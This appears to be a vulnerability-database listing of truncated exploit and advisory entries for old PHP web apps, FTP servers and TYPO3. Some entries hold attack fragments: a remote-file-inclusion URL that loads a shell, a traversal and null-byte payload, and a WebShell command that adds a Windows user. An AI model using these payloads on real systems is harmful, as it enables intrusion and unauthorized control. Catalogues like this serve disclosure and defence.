fcring-rfi.txt

FCRing 1.3 Webringskript Found by kezzap66345 Script: http://www.scripter.ch/start.php?id=41.18.9&pos=fcring&title=FCRing%201.3 ERROR: if$sfuss != "" include$sfuss; rfi coded RFI: http://SITE.com/path/fcring.php?sfuss=SHELL kezzap66345athotmaildotcom thanx=x0r0nstr0keshika...

eXtreme File Hosting - Arbitrary .RAR File Upload

eXtreme File Hosting - Arbitrary .RAR File Upload source: https://www.securityfocus.com/bid/22498/info eXtreme File Hosting is prone to an arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue could allow an attacker to upload and...

eXtreme File Hosting - Arbitrary '.RAR' File Upload

source: https://www.securityfocus.com/bid/22498/info eXtreme File Hosting is prone to an arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue could allow an attacker to upload and execute arbitrary PHP script code in the context ...

CVE-2007-0808

PHP remote file inclusion vulnerability in Mina Ajans Script allows remote attackers to execute arbitrary PHP code via a URL in the syf parameter to an unspecified PHP script...

Michelle's L2J Dropcalc

============================================================================================== Title: Michelle's L2J Dropcalc Version: = v4 Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm Discovered By: Codebreak [email protected] | www.codebreak.tk...

Michelles L2J Dropcalc 4 - SQL Injection

Michelles L2J Dropcalc 4 - SQL Injection ============================================================================================== Title: Michelle's L2J Dropcalc Version: = v4 Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm Discovered By: Codebreak [email protected] ...

Michelles L2J Dropcalc 4 - SQL Injection

============================================================================================== Title: Michelle's L2J Dropcalc Version: = v4 Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm Discovered By: Codebreak [email protected] | www.codebreak.tk...

Oreon lang/index.php file Parameter Remote File Inclusion

The remote host is running Oreon, a web-based network supervision program based on Nagios. The installation of Oreon on the remote host fails to sanitize input to the 'file' parameter of the 'lang/index.php' script before using it to include PHP code. Regardless of PHP's 'registerglobals' setting...

WoltLab Burning Board search.php Multiple Parameter SQL Injection

The version of Burning Board / Burning Board Lite on the remote host fails to sanitize user input to the 'boardids' parameter of the 'search.php' script before using it in database queries. Regardless of PHP's 'registerglobals' and 'magicquotesgpc' settings, an unauthenticated, remote attacker ca...

Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities

Actually, this can be pretty serious depending on server settings, but an improper example was given. Better one: jaxpetitionbook.php?languagepack=../../someotherallowedfileuploads/myfile.php.gif00 Many servers will have magic quotes on to defeat the null byte, but by no means all. John...

Article System 0.1 - 'INCLUDE_DIR' Remote File Inclusion

Script:Article System Affected Version:1.0 Download:http://kent.dl.sourceforge.net/sourceforge/artsys/artsys-0.1-20020705.tar.gz Author:Dr Max Virus Bug in:/path/include Vul Code; requireonce "$INCLUDEDIR/classes/class.formitem.php"; POC:...

CVE-2007-0082

This entry covers CVE-2007-0082 affecting IMGallery 2.5 and earlier. The vulnerability occurs in users_adm/start1.php where files with multiple extensions are not properly handled, allowing remote authenticated users to upload and execute arbitrary PHP scripts. The documented impact is partial co...

Nuked Klan <= 1.7 Remote Cookie Disclosure Exploit

Nuked Klan = 1.7 Remote Cookie Disclosure Exploit - Vendor : www.nuked-klan.org/ - Found by NeoSSJ & Kad' - Full disclosure on 31 December 2006 - Notice : you only have to create a .swf file, and you put on :...

WebText 0.4.5.2 - Remote Code Execution

DEVIL TEAM IRC: irc.milw0rm.com:6667 devilteam http://www.rahim.webd.pl/ ======== Contact: [email protected] cod3d by Kacper -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-...

TYPO3 'spell-check-logic.php' 'userUid' Parameter Arbitrary Command Execution

The remote host is running TYPO3, an open source content management system written in PHP. The version of TYPO3 installed on the remote host fails to sanitize user-supplied input to the 'userUid' parameter before using it in the 'spell-check-logic.php' script to execute a command. An...

Serv-U steal the administrator password novice section-Vulnerability warning-the black bar safety net

Sometimes we get the WebShell is very pleased with the Serv-U local privilege escalation vulnerability to achieve complete control of broiler purposes, but will always go wrong. We at WebShell input of a command is generally like this: D:\WEB\su.exe “net user 1 1 /add” Many cases can not be...

Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service

No description provided by source. ?php Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service by shinnai mail: shinnaiatautisticidotorg site: http://shinnai.altervista.org special thanks to rgod for his first advisory about "STOR" Denial of service, see:...

FileZilla FTP Server 0.9.21 - LISTNLST Denial of Service

FileZilla FTP Server 0.9.21 - LISTNLST Denial of Service ?php Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service by shinnai mail: shinnaiatautisticidotorg site: http://shinnai.altervista.org special thanks to rgod for his first advisory about "STOR" Denial o...

ThinClientServer Admin Account Creation Privilege Escalation

The remote host is running ThinClientServer, an application to convert existing PCs into thin clients. The version of ThinClientServer installed on the remote host allows an unauthenticated, remote attacker to create administrative accounts. %NASLMINLEVEL 70300 C Tenable Network Security...

CVE-2006-6255

The CVE-2006-6255 entry concerns the NukeAI 0.0.3 Beta module for PHP-Nuke, where a vulnerability in util.php allows remote code execution. An attacker can upload and execute arbitrary PHP code by supplying a filename with a .php extension in the filename parameter and code in the moreinfo parame...